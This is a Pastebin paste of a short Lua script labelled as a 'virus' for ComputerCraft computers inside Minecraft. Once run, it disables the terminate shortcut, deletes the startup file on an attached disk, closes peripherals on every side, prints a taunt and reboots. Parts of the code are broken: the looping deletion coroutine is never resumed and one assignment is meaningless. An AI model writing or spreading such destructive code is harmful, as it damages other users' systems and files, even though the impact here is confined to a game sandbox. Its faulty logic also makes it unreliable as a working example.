Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Simple ComputerCraft Virus
- local fB=true
- function fA()
- while(fB) do
- fs.delete("disk/startup")
- end
- end
- os.pullEvent=os.pullEventRaw
- fs.delete("disk/startup")
- pcall(peripheral.call, "left","close")
- pcall(peripheral.call, "right","close")
- pcall(peripheral.call, "top","close")
- pcall(peripheral.call, "bottom","close")
- pcall(peripheral.call, "front","close")
- pcall(peripheral.call, "back","close")
- print("Brute called Snitzel!")
- coroutine.create(fA)
- sleep(3)
- kiki=fB
- os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement